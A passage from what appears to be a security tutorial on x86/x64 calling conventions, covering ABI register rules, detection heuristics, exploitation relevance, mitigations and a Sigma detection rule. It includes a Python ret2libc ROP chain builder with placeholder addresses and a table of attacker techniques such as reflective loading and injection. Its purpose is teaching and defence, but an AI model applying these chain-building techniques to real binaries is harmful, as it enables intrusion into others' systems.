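
Reading the rule in reverse is often more useful: a symbol such as _foo@8 in a map file states both the convention and the number of argument bytes the callee will pop.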
6. Microsoft x64 ABI: The Modern Windows Convention
On Windows x64 there is effectively one ABI; the /Gd, /Gr, /Gz flags only exist for x86 targets. The convention is a four-register fastcall:
| Argument slot | Integer register | Float register |
|---|---|---|
| 1 | RCX | XMM0 |
| 2 | RDX | XMM1 |
| 3 | R8 | XMM2 |
| 4 | R9 | XMM3 |
Key rules:
- One-to-one correspondence: each argument maps to exactly one register/slot; a single argument is never split across registers.
- Any argument larger than 8 bytes, or not sized 1/2/4/8 bytes, is passed by reference.
- Arguments beyond the first four go on the stack after the shadow space.
- The stack must be 16-byte aligned before CALL.
- The x87 register stack is unused by the convention (a callee may use it, but it must be treated as volatile across calls); floating-point work uses the 16 XMM registers.
Shadow space (home space): the caller must allocate 32 bytes on the stack before the CALL, even if the callee takes fewer than four arguments, and reclaim it afterward. The callee may spill RCX/RDX/R8/R9 into this region.
; foo(a, b, c, d) -- Microsoft x64
mov rcx, a
mov rdx, b
mov r8, c
mov r9, d
sub rsp, 20h ; 32 bytes shadow space (caller's job)
call foo
add rsp, 20h ; reclaim shadow space
Volatile (caller-saved): RAX, RCX, RDX, R8, R9, R10, R11, XMM0–XMM5.
Non-volatile (callee-saved): RBX, RBP, RDI, RSI, R12–R15, XMM6–XMM15.

7. System V AMD64 ABI: The Linux and macOS Convention
System V AMD64 is followed on Linux, macOS, FreeBSD, Solaris, and other POSIX systems. It uses six integer argument registers:
| Argument slot | Integer register | Float register |
|---|---|---|
| 1 | RDI | XMM0 |
| 2 | RSI | XMM1 |
| 3 | RDX | XMM2 |
| 4 | RCX | XMM3 |
| 5 | R8 | XMM4 |
| 6 | R9 | XMM5 |
| 7–8 | (stack) | XMM6–XMM7 |
Additional arguments push onto the stack in reverse order. The return value is in RAX; for 128-bit returns the high 64 bits go in RDX. The stack is 16-byte aligned just before CALL.
- Callee-saved: RBX, RBP, R12–R15. All others are caller-saved.
- Red zone: the 128 bytes below RSP are reserved and untouched by signal/interrupt handlers. Leaf functions may use this area as their entire frame without adjusting RSP.
- Syscall variant: kernel entry uses the same registers except R10 replaces RCX (because the syscall instruction clobbers RCX).
- Varargs: for variadic functions, AL (the low byte of RAX) must hold an upper bound on the number of vector (XMM) registers used, 0–8.
; write(1, buf, len) via syscall -- System V
mov rax, 1 ; sys_write
mov rdi, 1 ; fd (arg1)
mov rsi, buf ; buffer (arg2)
mov rdx, len ; count (arg3)
; NOTE: a syscall uses R10 in place of RCX for arg4
syscall
; leaf function may freely use [rsp-128 .. rsp] (red zone)
⚠️ Shadow space vs. red zone are mutually exclusive and commonly confused. Shadow space (32 bytes above the call) exists only on Windows x64. The red zone (128 bytes below RSP) exists only on System V. Never assume both.

8. Side-by-Side Comparison and ABI Detection in Disassembly
| Property | Microsoft x64 | System V AMD64 |
|---|---|---|
| Integer arg registers | RCX, RDX, R8, R9 | RDI, RSI, RDX, RCX, R8, R9 |
| FP arg registers | XMM0–XMM3 | XMM0–XMM7 |
| Shadow space | 32 bytes (mandatory) | None |
| Red zone | None | 128 bytes below RSP |
| Callee-saved | RBX, RBP, RDI, RSI, R12–R15, XMM6–15 | RBX, RBP, R12–R15 |
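The register rows in the table hide one behavioural difference: Microsoft x64 assigns registers by argument position, while System V keeps separate counters for integer and floating-point arguments. The sketch below makes that visible for simple scalar arguments only; the function names are invented here, and aggregates, by-reference passing, and variadic calls are not modelled.

```python
MS_INT = ["RCX", "RDX", "R8", "R9"]
MS_FP = ["XMM0", "XMM1", "XMM2", "XMM3"]
SYSV_INT = ["RDI", "RSI", "RDX", "RCX", "R8", "R9"]
SYSV_FP = [f"XMM{i}" for i in range(8)]

def assign_ms_x64(kinds):
    """kinds: 'int' or 'float' per argument. Slot i uses register i of its class."""
    return [(MS_INT[i] if kind == "int" else MS_FP[i]) if i < 4 else "stack"
            for i, kind in enumerate(kinds)]

def assign_sysv(kinds):
    """Integer and floating-point arguments consume registers independently."""
    ints, floats = iter(SYSV_INT), iter(SYSV_FP)
    return [next(ints if kind == "int" else floats, "stack") for kind in kinds]

signature = ["int", "float", "int", "float", "int"]
print(assign_ms_x64(signature))
print(assign_sysv(signature))
```

For this signature the Microsoft convention skips RDX and R9 entirely and spills the fifth argument to the stack, while System V keeps all five in registers.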
Recognition heuristics in IDA/Ghidra:
- A sub rsp, 0x20 immediately before CALL and arguments loaded into RCX/RDX/R8/R9 ⇒ Microsoft x64.
- Arguments loaded into RDI/RSI/RDX and writes into [rsp-8] without a prior sub rsp ⇒ System V (red zone).
- A ret N (non-zero immediate) on 32-bit code ⇒ stdcall or fastcall; arguments in ECX/EDX distinguish fastcall.
- A bare ret with caller-side add esp, N ⇒ cdecl.
Automated ABI detection can misfire on hand-written assembly, non-MSVC fastcall, or -fomit-frame-pointer builds — always confirm against the actual prologue.
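As a rough illustration of how these heuristics could be automated, the following Python sketch classifies a short list of Intel-syntax instruction strings. It is deliberately crude: the function name `guess_convention`, the return labels, and the text-matching approach are all assumptions made for this example, and it only understands decimal and `0x`-prefixed immediates. Real tools work on decoded instructions and data flow, not strings.

```python
import re

# Matches a memory operand below RSP, e.g. [rsp-8] or [rsp - 0x10]
_RED_ZONE = re.compile(r"\[rsp\s*-\s*(?:0x[0-9a-f]+|\d+)\]")
_RET_N = re.compile(r"^retn?\s+(0x[0-9a-f]+|\d+)$")
_DEST = re.compile(r"^(?:mov|lea|xor)\s+(\w+)\s*,")


def _imm(text):
    """Parse a decimal or 0x-prefixed immediate."""
    return int(text, 16) if text.startswith("0x") else int(text)


def guess_convention(lines, bits=64):
    """Very rough convention guess from Intel-syntax instruction strings."""
    ins = [line.split(";")[0].strip().lower() for line in lines]
    ins = [i for i in ins if i]

    if bits == 32:
        for i in ins:
            m = _RET_N.match(i)
            if m and _imm(m.group(1)) != 0:
                return "stdcall_or_fastcall"  # callee cleans the stack
        if any(i in ("ret", "retn") for i in ins):
            return "cdecl"  # caller is expected to clean up
        return "unknown"

    adjusts_rsp = any(re.match(r"^sub\s+rsp\s*,", i) for i in ins)
    if any(_RED_ZONE.search(i) for i in ins) and not adjusts_rsp:
        return "sysv_amd64"  # red-zone use without a frame allocation

    dests = set()
    for i in ins:
        m = _DEST.match(i)
        if m:
            dests.add(m.group(1))
    has_call = any(i.startswith("call") for i in ins)
    if has_call and dests & {"rdi", "edi", "rsi", "esi"}:
        return "sysv_amd64"
    if has_call and adjusts_rsp and dests & {"rcx", "ecx"}:
        return "ms_x64"
    return "unknown"


if __name__ == "__main__":
    snippet = ["sub rsp, 0x28", "mov ecx, 1", "call puts", "add rsp, 0x28", "ret"]
    print(guess_convention(snippet))
```

The sketch misfires in exactly the cases the caveat above lists, for example a Windows function that saves an argument with `mov rdi, rcx`, so treat its answer as a hint to check against the prologue, not a verdict.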
9. Calling Conventions as an Attack Surface
Each convention places the return address at a known offset from a local buffer. That offset is the difference between a working and a failing overflow.
In 64-bit binaries, overflowing a buffer controls stack contents, not registers directly — which is exactly why return-oriented programming is needed. To call a libc function on x64 Linux, you must first load the argument register: a pop rdi ; ret gadget sets arg 1 before the call. This is a direct consequence of the System V ABI placing arg 1 in RDI.
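To make the register-loading step concrete, here is a minimal Python sketch of how such a chain is laid out in memory. Every address in the usage example is a made-up placeholder, and the function name `build_ret2libc_chain` and its parameters are hypothetical. The optional `ret_gadget` reflects the common need to restore 16-byte stack alignment before the call; whether it is needed depends on the target.

```python
import struct


def build_ret2libc_chain(offset, pop_rdi_ret, arg1, func_addr, ret_gadget=None):
    """Lay out a one-argument System V call as little-endian 64-bit stack slots.

    offset      -- bytes from the start of the buffer to the saved return address
    pop_rdi_ret -- address of a `pop rdi ; ret` gadget (placeholder value)
    arg1        -- value to load into RDI (argument 1 under System V)
    func_addr   -- address of the function to return into
    ret_gadget  -- optional bare `ret` gadget used only to fix stack alignment
    """
    chain = b"A" * offset                      # filler up to the return slot
    if ret_gadget is not None:
        chain += struct.pack("<Q", ret_gadget)  # shifts RSP by 8 for alignment
    chain += struct.pack("<Q", pop_rdi_ret)    # overwrites the saved return address
    chain += struct.pack("<Q", arg1)           # popped into RDI by the gadget
    chain += struct.pack("<Q", func_addr)      # gadget's ret lands here
    return chain


if __name__ == "__main__":
    # All addresses below are illustrative placeholders, not real targets.
    payload = build_ret2libc_chain(72, 0x401234, 0x402000, 0x401050)
    print(len(payload), payload[72:].hex())
```

The three 8-byte slots mirror the ABI directly: the gadget address replaces the return address, the next slot is consumed by `pop rdi`, and the final slot becomes the new return target with RDI already set.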
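On Windows x64, the mandatory 32-byte shadow space is a classic source of off-by-32 errors in cross-platform shellcode, though not because it lengthens the overflow itself. The shadow space a function reserves for its callees sits at the bottom of its frame, below its locals, so it does not add to the distance from a local buffer up to the saved return address. What it changes is the layout above each return address: those 32 bytes belong to the callee, which may overwrite them, so a chain of calls has to pad for them.
A conceptual offset calculator makes the dependency explicit:
def return_addr_offset(buf_size, conv):
    # bytes from start of local buffer to the saved return address,
    # assuming the buffer sits directly below a saved frame pointer
    # (no canary, no alignment padding, no other saved registers)
    if conv == "x86_cdecl" or conv == "x86_stdcall":
        return buf_size + 4  # + saved EBP (4 bytes)
    if conv == "sysv_amd64":
        return buf_size + 8  # + saved RBP (8 bytes)
    if conv == "ms_x64":
        # shadow space lies below the buffer, so it adds nothing here
        return buf_size + 8  # + saved RBP (8 bytes), if one is pushed
    raise ValueError("unknown convention")
Frame-pointer presence (-fomit-frame-pointer removes the saved RBP), alignment padding, and stack cookies all change the answer, and on Windows the shadow space changes what follows the return address, which is why convention awareness precedes any reliable payload.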

10. Common Attacker Techniques
| Technique | Description |
|---|---|
| Saved return-address overwrite | Overflow a local buffer to clobber the convention-determined return slot |
| Return-to-libc (x86) | Stack-arranged args (cdecl) let an attacker call system() without shellcode |
| ROP register loading (x64) | Use pop rdi ; ret / pop rcx ; ret gadgets to satisfy the ABI before a call |
| Shadow-space-aware stack pivot | Account for the 32-byte home space when chaining Windows x64 gadgets |
| IAT patching via decoration | Resolve _func@N decorated stdcall imports for shellcode loaders |
| Reflective API calls | Manually set up RCX/RDX/R8/R9 + shadow space before invoking LoadLibraryA |
Reflective loaders and injected shellcode must respect the target ABI exactly — wrong argument registers or a missing shadow allocation crashes the call.
11. Defensive Strategies & Detection
Note: A calling convention is a compile-time/binary property — no Sysmon Event ID fires because a convention is used. Detection is indirect: it triggers on the runtime artifacts of a convention-aware exploit.
Compile-time mitigations motivated directly by convention layout:
- Stack canaries: /GS (MSVC) and -fstack-protector-strong (GCC/Clang) detect a return-address overwrite before RET.
- Control Flow Guard: /guard:cf validates indirect CALL targets.
- Intel CET / Shadow Stack: hardware enforces that RET pops the address CALL pushed, directly countering return-address overwrites. Mark binaries as compatible with the /CETCOMPAT linker option, which sets IMAGE_DLLCHARACTERISTICS_EX_CET_COMPAT (0x0001) in the extended DLL characteristics.
- ASLR + PIE: randomizes addresses so a known layout still yields unknown absolute targets.
- -mno-red-zone: used for Linux kernel code, where interrupt handlers run on the same stack and would otherwise clobber the red zone.
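Whether a Windows binary was actually built with some of these mitigations can be read from its PE header. The sketch below parses the `DllCharacteristics` field from raw file bytes using only the standard library. The function name `pe_mitigations` is hypothetical, and the check covers only the four header bits listed; stack canaries leave no header flag, so they are out of scope here.

```python
import struct

# DllCharacteristics bits from the PE optional header
DLLCHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",  # 64-bit ASLR
    0x0040: "DYNAMIC_BASE",     # ASLR
    0x0100: "NX_COMPAT",        # DEP
    0x4000: "GUARD_CF",         # Control Flow Guard
}


def pe_mitigations(data):
    """Return the set of mitigation flag names set in a PE image's header."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (pe_off,) = struct.unpack_from("<I", data, 0x3C)  # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    # Optional header follows the 4-byte signature and 20-byte COFF header
    opt = pe_off + 4 + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError("unknown optional-header magic")
    # DllCharacteristics is at offset 70 in both PE32 and PE32+
    (flags,) = struct.unpack_from("<H", data, opt + 70)
    return {name for bit, name in DLLCHARACTERISTICS.items() if flags & bit}


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as fh:
        print(sorted(pe_mitigations(fh.read(4096))))
```

Run against a file path, it prints the flags found; a network-facing service binary that reports neither `DYNAMIC_BASE` nor `GUARD_CF` is a reasonable candidate for a rebuild or closer monitoring.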
Runtime telemetry for the exploitation aftermath:
- Sysmon Event ID 1 (Process Create): anomalous children of network-facing services after a successful ROP/return-to-libc chain.
- Sysmon Event ID 10 (Process Access): the cross-process handle request that precedes VirtualAllocEx/WriteProcessMemory from convention-correct injected shellcode.
- Sysmon Event ID 7 (Image Load): unexpected DLL loads from a corrupted return address redirecting into LoadLibrary.
- Microsoft-Windows-Threat-Intelligence ETW: kernel telemetry on NtAllocateVirtualMemory/NtWriteVirtualMemory.
- Audit Process Creation (Event 4688) with command-line logging.
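For triage outside a SIEM, the parent/child check from the first bullet can be expressed as a plain Python filter. This sketch assumes each Sysmon event has already been parsed into a dictionary keyed by the standard Sysmon field names (`EventID`, `ParentImage`, `Image`); the dictionary format, the function name `is_suspicious_child`, and the short process lists are assumptions for illustration. It applies the same matching logic as the Sigma rule that follows.

```python
# Parent processes that face the network and should rarely spawn shells
SERVICE_PARENTS = ("\\w3wp.exe", "\\sqlservr.exe")
# Child processes that suggest post-exploitation command execution
SHELL_CHILDREN = ("\\cmd.exe", "\\powershell.exe")


def is_suspicious_child(event):
    """Return True for a process-create event where a service spawns a shell.

    `event` is assumed to be a dict of already-parsed Sysmon fields.
    """
    if event.get("EventID") != 1:
        return False
    # Windows paths are case-insensitive, so compare in lower case
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    return parent.endswith(SERVICE_PARENTS) and image.endswith(SHELL_CHILDREN)


if __name__ == "__main__":
    sample = {
        "EventID": 1,
        "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
        "Image": "C:\\Windows\\System32\\cmd.exe",
    }
    print(is_suspicious_child(sample))
```

Matching on the path suffix with a leading backslash avoids false hits on names that merely end in the same characters, such as `notcmd.exe`.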
title: Suspicious Child Process from Network-Facing Service After Exploitation
logsource:
    product: windows
    service: sysmon
detection:
    selection:
        EventID: 1
        ParentImage|endswith:
            - '\w3wp.exe'
            - '\sqlservr.exe'
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
    condition: selection
level: high
12. Tools for Calling-Convention Analysis
| Tool | Description | Link |
|---|---|---|
| IDA Pro / Ghidra | Decompiler ABI inference and stack-frame reconstruction | ghidra-sre.org |
| x64dbg | Live register/stack inspection on Windows | x64dbg.com |
| GDB + pwndbg | Stack and register view on Linux (x/16gx $rsp) | gnu.org |
| WinDbg | Inspect shadow space and frame layout (dq rsp) | microsoft.com |
| Godbolt Compiler Explorer | Compare emitted asm across conventions/compilers | godbolt.org |
| ROPgadget / Ropper | Enumerate pop rdi ; ret-style register-loading gadgets | github.com |
| NASM | Hand-assemble convention test cases | nasm.us |
| Radare2 | Cross-platform disassembly and ABI heuristics | rada.re |
13. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Exploitation for Client Execution | T1203 | Crash telemetry, Event 4688 child-process anomalies |
| Exploit Public-Facing Application | T1190 | WAF/IDS, anomalous service children (Event ID 1) |
| Process Injection | T1055 | Sysmon Event ID 10 (VirtualAllocEx/WriteProcessMemory) |
| Process Injection: DLL Injection | T1055.001 | Event ID 7 unexpected LoadLibraryA loads |
| Command and Scripting Interpreter | T1059 | Event ID 1 cmd.exe/powershell.exe spawns |
| Reflective Code Loading | T1620 | ETW Threat-Intelligence memory-write telemetry |
ATT&CK has no technique ID for “calling-convention abuse” — convention knowledge is prerequisite craft underlying these exploitation and injection techniques.
Summary
- Calling conventions are the binary-level contract that makes stack layout deterministic, and therefore exploitable.
- x86 splits into cdecl (caller cleanup, variadics, _foo), stdcall (callee RET N, _foo@N), and fastcall (ECX/EDX, MSVC-specific vs. Borland’s EAX/EDX/ECX).
- The two 64-bit ABIs differ in argument registers (RCX, RDX, R8, R9 vs. RDI, RSI, RDX, RCX, R8, R9), shadow space (Windows only) vs. red zone (System V only), and callee-saved sets.
- Convention dictates the buffer-to-return-address offset and the ROP register-loading gadgets required: pop rdi ; ret on Linux, shadow-space accounting on Windows.
- Detect the exploitation artifacts, not the convention: Sysmon Event IDs 1/7/10, ETW Threat-Intelligence telemetry, and Event 4688. Harden builds with canaries, CFG, and CET shadow stacks.
Related Tutorials
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
- x86 and x64 Assembly from Scratch
- Writing Your First Shellcode: x86 Reverse Shell from Scratch
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
References
- Calling Conventions (cdecl, stdcall, fastcall, and others) | Microsoft Learn
- x64 Calling Convention | Microsoft Learn
- x64 ABI Conventions (x64 Software Conventions) | Microsoft Learn
- System V Application Binary Interface AMD64 Architecture Processor Supplement (Official psABI PDF) | uclibc.org
- Calling Conventions for Different C++ Compilers and Operating Systems (Agner Fog) | agner.org
- x86 Disassembly/Calling Conventions | Wikibooks